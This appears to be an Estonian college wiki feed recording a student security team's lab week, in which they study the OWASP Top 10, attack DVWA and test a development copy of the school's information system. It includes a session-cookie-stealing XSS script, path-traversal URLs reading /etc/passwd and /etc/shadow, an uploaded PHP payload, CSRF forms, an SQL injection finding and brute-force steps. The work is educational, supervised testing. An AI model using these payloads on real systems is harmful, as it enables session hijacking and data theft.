&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47032</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47032"/>
		<updated>2012-03-30T11:36:31Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Väike upload tegevus, mis võiks olla teisiti */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
